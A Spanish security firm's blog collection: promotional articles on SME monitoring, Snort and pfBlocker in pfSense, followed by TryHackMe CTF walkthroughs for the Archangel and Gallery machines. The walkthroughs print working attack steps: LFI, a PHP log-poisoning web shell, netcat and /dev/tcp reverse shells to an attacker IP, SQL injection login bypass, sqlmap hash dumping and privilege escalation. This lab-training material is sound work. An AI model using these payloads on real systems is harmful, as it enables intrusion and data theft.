En un mundo cada vez más digitalizado, las pequeñas y medianas empresas (PYMEs) enfrentan desafíos constantes en el ámbito de la ciberseguridad. La creciente sofisticación de las amenazas cibernéticas exige que las PYMEs adopten medidas proactivas para proteger sus activos digitales y mantener la confianza de sus clientes. Una de las herramientas más críticas en la defensa contra las amenazas cibernéticas es la monitorización de servicios de ciberseguridad. En este artículo, exploraremos en profundidad la importancia de la monitorización en la ciberseguridad de una PYME, así como las mejores prácticas para implementarla de manera efectiva.
¿Qué es la monitorización de servicios de ciberseguridad?
Antes de adentrarnos en la importancia de la monitorización en la ciberseguridad de una PYME, es crucial comprender qué implica esta práctica. La monitorización de servicios de ciberseguridad es un proceso continuo que implica la supervisión constante de la infraestructura tecnológica de una organización en busca de posibles amenazas y vulnerabilidades. Esta supervisión se realiza mediante herramientas y software especializados que recopilan datos sobre la actividad de red, el tráfico de datos y otros indicadores clave de seguridad.
¿Cómo funciona la monitorización de servicios de ciberseguridad?
La monitorización de servicios de ciberseguridad se basa en la recopilación de datos en tiempo real y el análisis de patrones anómalos que puedan indicar una amenaza cibernética. Estos datos provienen de una variedad de fuentes, incluidos firewalls, sistemas de detección de intrusiones, registros de eventos de seguridad y más. Cuando se detecta una actividad sospechosa, el sistema de monitorización emite alertas a los equipos de seguridad para que puedan tomar medidas inmediatas y mitigar la amenaza.
Importancia de la monitorización en la ciberseguridad de una PYME
Ahora que hemos establecido qué es la monitorización de servicios de ciberseguridad, es el momento de explorar por qué es esencial para las PYMEs. Aunque las grandes corporaciones a menudo cuentan con recursos significativos para invertir en ciberseguridad, las PYMEs también son blancos atractivos para los ciberdelincuentes debido a su relativa falta de defensas robustas. Aquí hay algunas razones clave que subrayan la importancia de la monitorización en la ciberseguridad de una PYME:
1. Detección temprana de amenazas
Las amenazas cibernéticas pueden evolucionar y propagarse rápidamente. La monitorización constante permite la detección temprana de actividades sospechosas o ataques en curso. Cuanto antes se identifique una amenaza, más fácil será contenerla y evitar daños graves.
2. Protección de datos sensibles
Las PYMEs a menudo manejan información confidencial de clientes, proveedores y empleados. La monitorización ayuda a garantizar que esta información esté protegida de posibles fugas o robos. La pérdida de datos puede tener consecuencias devastadoras tanto en términos de reputación como de responsabilidad legal.
3. Cumplimiento normativo
Muchas industrias están sujetas a regulaciones estrictas en cuanto a la protección de datos y la ciberseguridad. La monitorización ayuda a las PYMEs a cumplir con estos requisitos y evitar multas y sanciones por incumplimiento.
4. Mantenimiento de la confianza del cliente
La confianza del cliente es un activo invaluable para cualquier empresa. Si los clientes perciben que sus datos no están seguros, es probable que busquen alternativas. La monitorización de servicios de ciberseguridad demuestra un compromiso con la seguridad de los datos del cliente, lo que puede fortalecer la lealtad de estos hacia la empresa.
¿Cómo implementar la monitorización de servicios de ciberseguridad en una PYME?
Ahora que hemos establecido la importancia de la monitorización en la ciberseguridad de una PYME, es esencial comprender cómo llevar a cabo esta práctica de manera efectiva. Aquí hay algunos pasos clave para implementar la monitorización de servicios de ciberseguridad en su empresa:
1. Evaluación de riesgos
Comience por evaluar los riesgos específicos a los que su empresa está expuesta. Esto puede incluir identificar los tipos de datos que maneja, las amenazas cibernéticas más comunes en su industria y las vulnerabilidades en su infraestructura tecnológica.
2. Selección de herramientas de monitorización
Investigue y seleccione las herramientas de monitorización que mejor se adapten a las necesidades de su PYME. Estas herramientas pueden variar desde sistemas de detección de intrusiones hasta soluciones de gestión de registros de seguridad. Asegúrese de que las herramientas elegidas sean escalables y compatibles con su infraestructura existente.
3. Configuración y personalización
Una vez que haya implementado las herramientas de monitorización, configure y personalice sus parámetros para que se ajusten a las necesidades de su empresa. Esto puede incluir la definición de reglas de alerta y la configuración de umbrales para identificar actividades sospechosas.
4. Capacitación del personal
La monitorización efectiva requiere que su equipo esté capacitado para interpretar las alertas y tomar medidas adecuadas. Proporcione capacitación regular a su personal de seguridad cibernética y asegúrese de que estén al tanto de las mejores prácticas de seguridad.
5. Respuesta a incidentes
Desarrolle un plan de respuesta a incidentes que detalle cómo su empresa abordará las amenazas cibernéticas cuando se detecten. Esto incluye la asignación de responsabilidades, la comunicación con las partes interesadas y la restauración de servicios después de un ataque.
Preguntas frecuentes (FAQs)
Pregunta 1: ¿Cuánto cuesta implementar la monitorización de servicios de ciberseguridad en una PYME?
El costo de implementar la monitorización de servicios de ciberseguridad puede variar según las necesidades y el tamaño de la empresa. Las herramientas de monitorización en sí pueden tener costos iniciales y costos de licencia continuos. Además, debe considerar el costo de la capacitación del personal y el mantenimiento de las herramientas. Si bien puede ser una inversión significativa, consideramos que la seguridad de los datos y la protección contra amenazas cibernéticas son fundamentales y justifican los gastos asociados.
Pregunta 2: ¿Qué tipo de amenazas cibernéticas puede detectar la monitorización de servicios de ciberseguridad?
La monitorización de servicios de ciberseguridad puede detectar una amplia variedad de amenazas cibernéticas, que incluyen ataques de malware, intrusiones en la red, intentos de robo de datos, phishing y más. Estas herramientas están diseñadas para identificar patrones y comportamientos sospechosos que podrían indicar una amenaza en desarrollo.
Pregunta 3: ¿Es necesario contar con un equipo de seguridad cibernética dedicado para implementar la monitorización en una PYME?
Aunque contar con un equipo de seguridad cibernética dedicado puede ser beneficioso, no es estrictamente necesario para implementar la monitorización de servicios de ciberseguridad en una PYME. Muchas empresas optan por externalizar los servicios de seguridad cibernética o capacitar a su personal existente en la gestión de estas herramientas. La elección dependerá de los recursos y las necesidades específicas de su empresa.
Conclusión
La importancia de la monitorización en la ciberseguridad de una PYME no puede ser subestimada en un entorno digital cada vez más peligroso. La capacidad de detectar y responder rápidamente a las amenazas cibernéticas es crucial para proteger los activos digitales, la reputación y la confianza de los clientes. Si bien la implementación de la monitorización puede implicar una inversión significativa, los beneficios en términos de seguridad y cumplimiento normativo hacen que valga la pena. En última instancia, la monitorización de servicios de ciberseguridad no solo es una medida de defensa, sino también una inversión en la sostenibilidad y el éxito a largo plazo de una PYME en el mundo digitalizado de hoy.
En resumen, la monitorización de servicios de ciberseguridad es una herramienta esencial para proteger su empresa contra las amenazas cibernéticas en constante evolución. Al comprender su importancia y seguir las mejores prácticas para su implementación, las PYMEs pueden fortalecer su postura de seguridad y mantener la confianza de sus clientes en un mundo digital cada vez más desafiante.
Confía en DCSeguridad
Si estás buscando una solución integral de ciberseguridad para tu PYME, no dudes en contactarnos en DCSeguridad. Nuestro equipo de expertos está listo para proteger tu negocio. ¡Únete a nuestro canal de Telegram para mantenerte actualizado sobre las últimas amenazas y soluciones! Tu seguridad es nuestra prioridad.
Si eres dueño de una pequeña o mediana empresa (PYME) y estás buscando formas de proteger tu red y datos de posibles amenazas cibernéticas, estás en el lugar adecuado. En este artículo, exploraremos cómo Snort en pfSense IDS/IPS (Sistema de Detección de Intrusiones/Sistema de Prevención de Intrusiones) puede ser tu mejor aliado en la batalla contra las ciberamenazas. A lo largo de esta lectura, descubrirás los beneficios que esta poderosa herramienta de seguridad puede aportar a tu negocio.
¿Qué es un IDS/IPS?
Comencemos por aclarar los conceptos. Un IDS, o Sistema de Detección de Intrusiones, es una solución de seguridad diseñada para monitorear y analizar el tráfico de red en busca de actividades sospechosas o maliciosas. Por otro lado, un IPS, o Sistema de Prevención de Intrusiones, no solo detecta estas amenazas, sino que también toma medidas para bloquearlas o mitigarlas automáticamente.
¿Qué es Snort y para qué sirve?
Snort es un software de código abierto ampliamente utilizado en la comunidad de seguridad cibernética. Funciona como un IDS/IPS y es capaz de detectar intrusiones en tiempo real. Snort utiliza reglas predefinidas y personalizables para identificar patrones de tráfico que podrían indicar un ataque. Una vez que se detecta una amenaza, Snort puede generar alertas y, si está configurado como IPS, tomar medidas para bloquear la actividad maliciosa.
¿Por qué una PYME necesita un IDS/IPS como Snort en pfSense?
La ciberseguridad se ha convertido en una preocupación crítica para las PYMEs, ya que también son blanco de ciberataques. Aquí te presentamos algunas razones por las cuales tu empresa debería considerar implementar Snort en pfSense:
Protección Proactiva: Snort en pfSense te brinda la capacidad de detectar y responder rápidamente a amenazas antes de que causen daño a tu red y datos sensibles.
Cumplimiento Regulatorio: Algunas industrias tienen regulaciones específicas sobre la seguridad de los datos. Snort en pfSense puede ayudarte a cumplir con estas regulaciones y evitar sanciones.
Visibilidad y Control: Con Snort, obtendrás una visión detallada del tráfico en tu red, lo que te permite identificar y comprender mejor las amenazas.
Reducción de Riesgos: Al prevenir intrusiones, reducirás el riesgo de pérdida de datos, tiempo de inactividad y daños a la reputación de tu empresa.
Ahorro de Costos: Abordar una violación de seguridad puede ser costoso. Snort en pfSense te ayuda a evitar estos gastos innecesarios.
Control de Aplicaciones con OpenAppID en Cisco/Snort
Si deseas un control aún más granular sobre las aplicaciones que se ejecutan en tu red, considera la integración de OpenAppID en Snort. OpenAppID es una tecnología que permite la identificación y el control de aplicaciones en la capa de aplicación. Esto significa que puedes gestionar y restringir el acceso a aplicaciones específicas, mejorando así la seguridad y la productividad de tu empresa.
Conclusion
En resumen, la ciberseguridad es un aspecto crítico para cualquier PYME en la actualidad. Snort en pfSense IDS/IPS ofrece una solución efectiva para proteger tu negocio contra las crecientes amenazas cibernéticas. Proporciona visibilidad, control y capacidad de respuesta, lo que te permite mantener tus datos y sistemas seguros. No escatimes en seguridad, ¡tu empresa lo agradecerá!
Únete a DCSeguridad y Protege tu Empresa con Snort en pfSense
En DCSeguridad, estamos comprometidos a ayudar a las PYMEs a fortalecer su seguridad cibernética. Contáctanos hoy mismo para obtener más información sobre cómo podemos proteger tu empresa. Además, te invitamos a unirte a nuestro canal de Telegram, donde compartimos consejos y noticias actualizadas sobre ciberseguridad. Tu negocio merece la mejor protección, y en DCSeguridad estamos aquí para proporcionarla. ¡No esperes a ser una víctima de un ciberataque, toma medidas ahora mismo!
¡Bienvenidos a DCSeguridad, tu aliado en el mundo de la ciberseguridad para pymes! Si estás aquí, es probable que te preguntes qué beneficios conlleva el uso de pfBlocker en pfSense para la red de tu empresa. En este artículo, despejaremos todas tus dudas y te mostraremos cómo esta poderosa herramienta puede convertirse en tu mejor defensa en la navegación web. Así que, sin más preámbulos, ¡empecemos!
La Importancia de la Seguridad en la Navegación Web
En el vertiginoso mundo digital de hoy, donde la tecnología y la conectividad son pilares fundamentales para las pymes, la seguridad en la navegación web se ha convertido en una preocupación apremiante. No importa el tamaño de tu empresa; las amenazas en línea son una realidad que afecta a todos por igual. Desde los emprendedores más pequeños hasta las medianas empresas, todos comparten un interés común: mantener sus sistemas y datos protegidos.
Vivimos en una era en la que la información fluye constantemente a través de la web. Desde comunicaciones empresariales hasta transacciones financieras y almacenamiento de datos en la nube, prácticamente todas las actividades comerciales dependen de la red. Sin embargo, esta interconexión constante también abre la puerta a una serie de amenazas que pueden poner en riesgo la integridad de tu empresa.
Los ciberdelincuentes están en constante búsqueda de vulnerabilidades que puedan explotar para acceder a sistemas y datos confidenciales. Los ataques cibernéticos pueden variar:
Desde simples intentos de phishing
Hasta ataques más sofisticados que pueden causar estragos en tu red y operaciones comerciales
Las consecuencias de un ciberataque pueden ser devastadoras:
Desde la pérdida de datos críticos
Hasta daños en la reputación de tu empresa y costos financieros significativos
Por lo tanto, la seguridad en la navegación web se ha convertido en una prioridad ineludible. Es esencial contar con herramientas y estrategias efectivas que protejan tu red empresarial contra las amenazas en línea. La inversión en ciberseguridad no solo es una medida proactiva para proteger tu empresa, sino que también es una muestra de compromiso con la confianza de tus clientes y socios comerciales.
En este contexto, pfBlocker en pfSense se destaca como una herramienta esencial para fortalecer la seguridad en la navegación web. ¿Quieres saber cómo esta solución puede convertirse en tu mejor aliado en la lucha contra las amenazas cibernéticas? Sigue leyendo para descubrirlo.
¿Qué es pfBlocker en pfSense?
Para entender los beneficios de pfBlocker en pfSense, primero debemos comprender qué es. En pocas palabras, pfBlocker es una aplicación que se integra con pfSense, un sistema operativo de firewall de código abierto. Su función principal es bloquear el tráfico no deseado o malicioso en la red, actuando como un escudo protector.
Beneficios de pfBlocker en pfSense
1. Navegación Web Segura
Una de las principales ventajas de pfBlocker es la creación de una capa adicional de seguridad en la navegación web. Bloquea automáticamente sitios web maliciosos conocidos, reduciendo significativamente el riesgo de infección por malware.
2. Inspección de Contenido
pfBlocker no solo se limita a bloquear sitios web, sino que también ofrece inspección de contenido. Esto significa que puedes establecer políticas para bloquear ciertos tipos de contenido, como contenido para adultos o sitios de redes sociales, lo que aumenta la productividad en el lugar de trabajo.
3. Listas Negras y Listas Blancas de pfBlocker en pfSense
Con la capacidad de administrar listas negras y listas blancas, tienes un control total sobre los sitios web permitidos y bloqueados. Personaliza las reglas según las necesidades de tu empresa.
4. DNSBL (Listas de Bloqueo de DNS)
pfBlocker utiliza listas de bloqueo de DNS para prevenir el acceso a dominios maliciosos. Esto asegura una protección más robusta y evita que el malware se comunique con servidores de comando y control.
5. Inspección de DNS
pfBlocker inspecciona el tráfico DNS, detectando y bloqueando las solicitudes a servidores DNS no autorizados. Esto fortalece la seguridad y evita que los atacantes eludan el firewall.
6. Resolución Segura de DNS
Con pfBlocker, puedes utilizar servidores DNS seguros como OpenDNS o Quad9, que ofrecen protección adicional contra sitios web maliciosos y phishing.
Cómo pfBlocker en pfSense Protege tu Pyme
Imagina pfBlocker como un guardián vigilante que protege las puertas de tu red. Cada vez que un usuario o dispositivo intenta acceder a un sitio web, pfBlocker verifica si está en una lista negra o si cumple con tus políticas de contenido. Si no pasa la prueba, se bloquea el acceso.
Maximiza la Retención: ¡Descubre más Beneficios!
Hasta ahora, hemos explorado los beneficios clave de pfBlocker en pfSense, pero hay mucho más por descubrir. ¿Quieres aprender cómo implementar pfBlocker en tu empresa? ¿Deseas conocer las mejores prácticas para mantener tu red segura? Sigue leyendo y desbloquea todo el potencial de esta herramienta.
Conclusion: Tu Escudo en la Web
En resumen, pfBlocker en pfSense es una pieza esencial en la estrategia de ciberseguridad de tu pyme. Protege tu negocio contra amenazas en línea, garantiza una navegación web segura y te brinda el control sobre el acceso a sitios web y contenido. No escatimes en seguridad, ¡y pfBlocker será tu mejor aliado!
Únete a DC Seguridad
En DCSeguridad, estamos comprometidos en ayudar a las pymes a fortalecer su seguridad en línea. Si deseas implementar pfBlocker en pfSense o necesitas asesoramiento personalizado en ciberseguridad, ¡contáctanos hoy mismo! Únete a nuestro canal de Telegram para estar al tanto de las últimas noticias y consejos de seguridad.
No comprometas la seguridad de tu empresa. ¡Confía en DC Seguridad y protege tu negocio en línea como nunca antes!
A continuación se presenta un manual paso a paso para realizar la máquina Archangel TryHackMe (https://tryhackme.com/room/archangel) el Hacking Ético en el desafío CTF. El manual incluye explicaciones sobre los comandos utilizados y sus respectivas banderas.
Nota: Este manual tiene fines educativos y solo debe ser utilizado en entornos controlados y con autorización.
Antes de empezar, recomendamos realizar los siguientes pasos preparativos:
Añade la IP de la máquina al archivo host
Crea un directorio con el nombre de la máquina para tener organizados los archivos
Crea un archivo para ir anotando todos los indicios que vayamos encontrando
Paso 1: Verificar la disponibilidad de la máquina
ping -c 1 <ip_máquina>
Este comando se utiliza para verificar la disponibilidad de la máquina objetivo mediante un ping.
El comando wfuzz se utiliza para buscar directorios y archivos ocultos en un servidor web. Los flags utilizados son:
-c: Ignora las respuestas con código de estado 404 (no encontrado).
--hc=404: Configura el código de estado que se debe ignorar.
-w /ruta_diccionario: Especifica la ruta del diccionario a utilizar.
-u http://ip/FUZZ: Establece la URL objetivo, donde «FUZZ» se reemplazará por las palabras del diccionario.
Este comando buscará directorios ocultos en el servidor web utilizando un diccionario de palabras.
Paso 4: Investigar directorio «flag» y redirecciones
burpsuite
Aquí no encontramos ninguna redirección rara, por lo que seguimos al siguiente paso, entrar en la web y encontrar el otro hostname que nos comentan. Cambia el archivo host para añadir el nuevo hostname encontrado.
Paso 5: Realizar escaneo de directorios con gobuster en Archangel TryHackMe
El comando gobuster se utiliza para realizar un escaneo de directorios y archivos en un servidor web. Los flags utilizados son:
dir: Realiza un escaneo de directorios.
-w /diccionario: Especifica la ruta del diccionario a utilizar.
-x php,html,txt: Establece las extensiones de archivo a buscar.
-t 100: Establece el número de hilos simultáneos.
-q: Muestra solo los resultados encontrados.
-u <ip_máquina>: Establece la URL objetivo.
Este escaneo revelará posibles directorios y archivos en la máquina objetivo, en esta ocasión vemos el archivo robots.txt, procedemos a acceder a él y vemos una página accesible, que vamos a ir a ella.
Paso 6: Investigar contenido de la nueva página
Explora el contenido del nuevo host encontrado en los pasos anteriores y busca pistas adicionales o banderas. También accede al archivo robots.txt y a la web encontrada en este archivo.
Paso 7: Local File Inclusion (LFI) Archangel TryHackMe
Accede al archivo /test.php para explorar una posible vulnerabilidad de Local File Inclusion (LFI). Esto podría proporcionar una vía de intrusión al sistema.
Vamos a probar a ver a que tenemos acceso en este servidor, para ello vamos a poner después de la carpeta de development /.././.././.././../etc/passwd para ver si tenemos acceso, el poner /.././ es para engañar al servidor y que no separa que estamos realizando un LFI, en otros casos, con /../../ y así sucesivamente podemos tener acceso a los archivos.
Tras esto vemos que tenemos acceso a ese archivo, y vemos los usuarios que pueden logarse en el servidor, como primera opción, y por probar, vamos a realizar un ataque con hydra: hydra -l archangel -P /dirección/diccionario <ip_máquina> ssh con esto no conseguimos nada, por lo que vamos a ver a que archivos tenemos acceso.
Vamos a ver los logs del apache, y ver si podemos hacer un ataque log poisoning para ello siguiendo la técnica anterior en vez de /etc/passwd accedemos a: /var/log/apache2/access.log, al tener acceso, vamos a proceder a realizar un ataque de log poisoning, si quieres aprender mas sobre esto, te dejo este enlace: https://ironhackers.es/tutoriales/lfi-to-rce-envenenando-ssh-y-apache-logs/
Paso 9: Log Poisoning Archangel TryHackMe
Para realizar el ataque abre burpsuite y captura el tráfico una vez capturado, mándalo directamente al repeater y realiza modificaciones en el campo «User-Agent» del encabezado de la petición. Cambia la parte entre paréntesis (X11; Linux...) por el siguiente código: <?php system($_GET['cmd']); ?>. Además, agrega &cmd=id después de .log en la URL. Luego, envía la petición y verifica sí recibes una respuesta con el ID del usuario «www-data».
Paso 10: Acceso remoto a la máquina objetivo
Reemplaza el &cmd=id del paso anterior por un reverse shell generado en https://www.revshells.com/. Utiliza el siguiente comando:
&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ip_maquina_atacante> puerto >/tmp/f
Ahora selecciona desde el = hasta la f y debes de codificar la URL, para ello dale botón derecho Convert Selection -> URL -> encode-all-characters.
Ponte en escucha en tu máquina atacante el puerto especificado para obtener acceso remoto a la máquina objetivo utilizando Netcat (nc -nvlp puerto).
Dale a send y espera a tener el control de la máquina víctima.
Paso 11: Búsqueda de banderas y escalada de privilegios en Archangel TryHackMe
Una vez dentro de la máquina, busca las banderas y explora las opciones disponibles para la escalada de privilegios. Considera los binarios, capacidades, permisos de sudo y crontab para encontrar posibles vulnerabilidades y obtener privilegios adicionales.
Identifica un cron que se ejecuta cada minuto con el usuario «archangel».
Intenta realizar una escalada de privilegios aprovechando este cron. Edita el archivo utilizando el editor de texto Nano y reemplaza la línea «hello world» por el siguiente comando:
sh -i >& /dev/tcp/10.9.81.252/1234 0>&1
Abre otro terminal y ejecuta nc -nvlp 1234. Espera hasta que obtengas acceso a la máquina como el usuario «archangel». A partir de aquí, explora las opciones disponibles para la escalada de privilegios con este usuario.
Paso 12: Acceso a la carpeta «secret» y ejecución de comandos
Accede a la carpeta «secret» y examina los archivos presentes en ella. Si encuentras un archivo comprimido, investiga su contenido utilizando el comando string. Observa que se ejecuta comandos y busca la presencia del comando «cp».
Paso 13: Escalada de privilegios y obtención de acceso root en Archangel TryHackMe
Crea un archivo llamado «cp» y establece los siguientes permisos en él: chmod u+s /bin/bash. Luego, otorga permisos de lectura, escritura y ejecución a todos los usuarios utilizando el comando chmod 777 cp.
A continuación, agrega el comando «cp» al PATH mediante el comando export PATH=.:$PATH. Después, ejecuta el archivo de backup utilizando ./backup y, finalmente, ejecuta el comando bash -p para obtener acceso como usuario root.
¡La máquina ha sido completamente comprometida! Ahora, busca la última bandera para completar el desafío.
Recuerda que este manual está diseñado para un desafío CTF y solo debe ser utilizado con fines educativos en entornos controlados y con autorización.
Resumen Archangel TryHackMe
La máquina Archangel TryHackMe presenta los siguientes aspectos clave:
Escaneo de puertos: Se utiliza la herramienta Nmap para identificar los puertos abiertos en la máquina. Se descubren los puertos 80 y 22 abiertos, lo que indica la presencia de servicios web y SSH.
Búsqueda de directorios ocultos: Se emplea la herramienta wfuzz para encontrar directorios y archivos ocultos en el sitio web. Mediante el análisis de las respuestas obtenidas, se descubre un directorio llamado «flag».
Análisis de redirecciones: A través de Burp Suite, se analiza la redirección encontrada en el directorio «flag». Sin embargo, la redirección lleva a un video de YouTube y no proporciona información adicional relevante.
Exploración de directorios con gobuster: Se utiliza la herramienta gobuster para buscar directorios ocultos en el dominio encontrado en el host. Se espera a que gobuster finalice su exploración mientras se busca la primera bandera en la nueva página.
Explotación de una vulnerabilidad LFI: Se descubre un archivo accesible llamado «test.php», el cual resulta ser una vulnerabilidad de inclusión de archivos locales (LFI). Se aprovecha esta vulnerabilidad para realizar un ataque de log poisoning y obtener información privilegiada, como el ID del usuario «www-data».
Reverse Shell: Mediante la técnica de log poisoning, se logra establecer un reverse shell en la máquina objetivo. Esto proporciona acceso remoto a la máquina a través de una conexión inversa desde la máquina del atacante.
Escalada de privilegios: Se exploran diferentes opciones para la escalada de privilegios. Se encuentra un cron ejecutándose con el usuario «archangel» y se realiza una segunda escalada de privilegios modificando el archivo correspondiente. Esto permite obtener acceso al usuario «archangel» y se buscan otras opciones de escalada de privilegios.
Búsqueda de banderas: Durante el proceso de hacking, se busca y recopila información sobre las banderas ocultas en la máquina. Se debe encontrar la última bandera después de comprometer la máquina y obtener privilegios de root.
Estas son las principales técnicas y pasos utilizados durante el CTF para lograr comprometer la máquina objetivo y obtener acceso a la información privilegiada.
Confía en DCSeguridad:
Si estás interesado en fortalecer aún más tus conocimientos y mantenerte al día con las últimas tendencias en seguridad informática, te recomendamos ponerte en contacto con DCSeguridad. Como empresa especializada en seguridad, DCSeguridad puede ofrecerte servicios de consultoría, auditoría y entrenamiento en seguridad informática.
Además, te animamos a unirte a nuestro canal de Telegram. En este canal, compartimos información relevante sobre nuevas vulnerabilidades, técnicas de ataque y mejores prácticas de seguridad. Es un lugar ideal para mantenerse actualizado y participar en discusiones con otros profesionales de seguridad. ¡Únete a nosotros y forma parte de nuestra comunidad dedicada a la seguridad informática!
Recuerda que la seguridad informática es un campo en constante evolución, por lo que es importante seguir aprendiendo y mejorando tus habilidades continuamente. ¡Buena suerte en tu viaje hacia convertirte en un experto en seguridad informática!
Descubre cómo realizar pentesting en la máquina Galley TryHackMe (https://tryhackme.com/room/gallery666) con nuestro completo manual. Aprende los pasos de preparación, técnicas de hackeo y escalada de privilegios. Obtén un enfoque práctico para proteger y fortalecer tus habilidades en seguridad informática. ¡Sigue nuestra guía paso a paso y conviértete en un experto en ciberseguridad!
Paso 1: Preparación del entorno para resolver Galley TryHackMe
Antes de comenzar con el pentesting, es importante realizar los siguientes pasos de preparación:
Actualización del sistema operativo: Asegúrate de tener la versión más reciente del sistema operativo que utilizarás durante el proceso de pentesting. Esto te garantizará tener las últimas actualizaciones de seguridad y correcciones de errores.
Organización de archivos: Crea una carpeta dedicada para la máquina que estás analizando. Esto te permitirá mantener tus archivos y resultados organizados de manera efectiva a lo largo del proceso.
Configuración del archivo de hosts: Agrega la dirección IP de la máquina que estás analizando al archivo de hosts de tu sistema. Esto facilitará el acceso a la máquina durante el proceso de pentesting.
Registro de indicios: Crea un archivo o registro donde puedas documentar todos los posibles indicios y hallazgos que descubras durante el análisis. Esto te ayudará a llevar un seguimiento ordenado y completo de tu progreso y resultados.
Realizar estos pasos de preparación garantizará que tengas un entorno adecuado y organizado para llevar a cabo el pentesting de manera eficiente.
Paso 2: Comienza el Hackeo en Galley TryHackMe
Una vez que hayas preparado el entorno, procede con los siguientes pasos para iniciar el hackeo:
Comprobación de disponibilidad: Para verificar si la máquina objetivo está en línea, utiliza el comando ping -c 1 [ip_maquina]. Esto enviará un solo paquete de ping a la dirección IP de la máquina y te indicará si está accesible.
Enumeración de puertos abiertos: Utiliza el siguiente comando para identificar los puertos abiertos en la máquina objetivo y responder la primera pregunta planteada:
Este comando utiliza Nmap para realizar un escaneo exhaustivo de la máquina y muestra información detallada sobre los servicios y versiones en los puertos abiertos. El resultado revelará que los puertos 80 y 8080 están abiertos.
Escaneo web con WhatWeb: A continuación, utiliza el comando whatweb [ip_maquina]:80 y whatweb [ip_maquina]:8080 para realizar un escaneo web en los puertos abiertos. Esto proporcionará información sobre las tecnologías y aplicaciones utilizadas en los servicios web.
Exploración de la aplicación con Dirb: Para buscar posibles directorios y archivos ocultos en la aplicación web que se encuentra en el puerto 8080, ejecuta el siguiente comando:
dirb http://gallery.thm:8080
Dirb realizará un análisis exhaustivo de la aplicación en busca de rutas y archivos que puedan ser relevantes para el hackeo.
Paso 3: Búsqueda de Exploits
Después de realizar los pasos anteriores sin encontrar resultados, es hora de buscar posibles exploits que puedan ser aprovechados en la versión de «Simple Image Gallery». Sigue los siguientes pasos:
Utiliza la herramienta searchsploit para buscar exploits relacionados con la versión de «Simple Image Gallery»:
searchsploit simple image gallery
Este comando buscará en la base de datos de exploits de la herramienta «searchsploit» y mostrará posibles exploits disponibles para la versión específica de «Simple Image Gallery».
Encuentra y selecciona dos posibles exploits que parezcan relevantes para tu objetivo.
Prueba el primer exploit seleccionado que permita una inyección SQL en el campo de inicio de sesión. Por ejemplo, si el exploit muestra una inyección SQL exitosa utilizando el usuario «admin» con la siguiente cadena: admin' or '1'='1'#, realiza la inyección en el campo de inicio de sesión para loguearte como administrador:
username: admin' or '1'='1'#
password: [deja en blanco]
Si la inyección SQL tiene éxito, obtendrás acceso al sitio como administrador.
Una vez dentro del sitio, explora las funcionalidades y opciones disponibles. Observa la sección de álbumes y verifica que existe la posibilidad de subir una «shell reversa».
Configura un listener en tu máquina atacante utilizando netcat para escuchar conexiones entrantes en un puerto específico:
nc -nlvp [puerto]
Haz clic en la opción de subir archivo para subir una «shell reversa» en el sitio web. Esto iniciará una conexión a tu máquina atacante y proporcionará acceso al servidor objetivo.
Paso 4: Segundo Exploit y Obtención del Hash de Contraseña
Salimos del Shell reverso y vamos a explorar otras opciones, con el otro exploit, para volver al shell reverso tenemos tiempo, y además aprenderemos nuevas formas de ataques y obtención de objetivos.
Abre Burp Suite y captura una solicitud HTTP cuando cargas una imagen en la aplicación. Guarda la solicitud capturada en un archivo llamado «test.req».
Utiliza la herramienta sqlmap para analizar la solicitud capturada y obtener información sobre las bases de datos presentes en la aplicación:
sqlmap -r test.req --dbs
Este comando enviará la solicitud capturada a la herramienta sqlmap, que analizará la estructura de la base de datos en busca de posibles vulnerabilidades.
Una vez obtenidos los nombres de las bases de datos, como «gallery_db» e «information_schema», ejecuta el siguiente comando para enumerar las tablas en la base de datos seleccionada:
sqlmap -r test.req -D database_name --tables
Reemplaza «database_name» por el nombre de la base de datos que deseas explorar.
Ahora, para obtener información sobre los usuarios y sus hashes de contraseña, ejecuta el siguiente comando:
Reemplaza «database_name» por el nombre de la base de datos y «table_name» por el nombre de la tabla que contiene los datos de los usuarios. Este comando extraerá la información de los usuarios, incluyendo los hashes de contraseña, si están disponibles.
Paso 5: Volver a la Shell Reversa en Galley TryHackMe
En este paso, retomaremos el uso de la shell reversa para obtener acceso al servidor objetivo. Sigue los siguientes pasos:
Configura una shell reversa en la máquina atacante para establecer la conexión con el servidor. Para mejorar la shell reversa, utiliza el siguiente comando:
script /dev/null -c bash
Esta línea de comando mejorará la interactividad y estabilidad de la shell reversa.
Exporta la variable de entorno «TERM» a «xterm» para asegurar una correcta visualización del terminal:
export TERM=xterm
Monta un servidor HTTP en tu máquina atacante utilizando Python para transferir el archivo «linpeas.sh» al servidor objetivo. Ejecuta el siguiente comando:
python3 -m http.server
Esto iniciará un servidor HTTP en tu máquina atacante.
En la máquina víctima, accede a un directorio en el que tengas los permisos necesarios y descarga el archivo «linpeas.sh» desde tu servidor atacante. Por ejemplo, si has elegido el directorio «/tmp», utiliza el siguiente comando:
wget [tu_ip]:8000/linpeas.sh -O /tmp/linpeas.sh
Asegúrate de reemplazar «[tu_ip]» con la dirección IP de tu máquina atacante.
Otorga permisos de ejecución al archivo «linpeas.sh»:
chmod +x /tmp/linpeas.sh
Ejecuta el script «linpeas.sh» para buscar vulnerabilidades en el sistema:
bash /tmp/linpeas.sh
Espera a que el script finalice su ejecución y analiza los resultados en busca de posibles vulnerabilidades.
Durante el análisis, es posible que descubras una contraseña de usuario. Prueba esta contraseña con el usuario «mike» utilizando el siguiente comando:
su mike
Si la contraseña es correcta, ahora tendrás acceso como el usuario «mike».
Verifica los permisos disponibles para tu usuario utilizando el comando:
sudo -l
Observa si tienes permisos para ejecutar archivos con la ruta «/bin/bash» utilizando el comando «sudo».
Paso 6: Escalada de Privilegios Final para Galley TryHackMe
En este paso, realizaremos la escalada final de privilegios utilizando una vulnerabilidad específica en el comando nano. Sigue los siguientes pasos:
Al hacer cat en el archivo en cuestión, descubrimos que podemos escalar privilegios utilizando nano con la opción read. Para obtener más información sobre cómo aprovechar esta vulnerabilidad, sigue las instrucciones detalladas en el siguiente enlace: https://gtfobins.github.io/gtfobins/nano/#sudo
Vamos a obtener una shell mejorada utilizando los siguientes pasos:
Escribe script /dev/null -c bash en la línea de comandos y presiona Ctrl+Z para suspender el proceso.
Una vez en tu terminal, escribe - stty raw -echo ; fg y presiona Enter. Esto reanudará la ejecución del proceso suspendido.
Ahora estarás de vuelta en la shell. Escribe reset y presiona Enter.
Ejecuta el comando sudo -l para verificar los privilegios disponibles. Observa la opción encontrada para ejecutar sudo /bin/bash /opt/rootkit.sh. Sin embargo, es posible que recibas un error de terminal.
Para solucionar el error de terminal, escribe export TERM=xterm y presiona Enter.
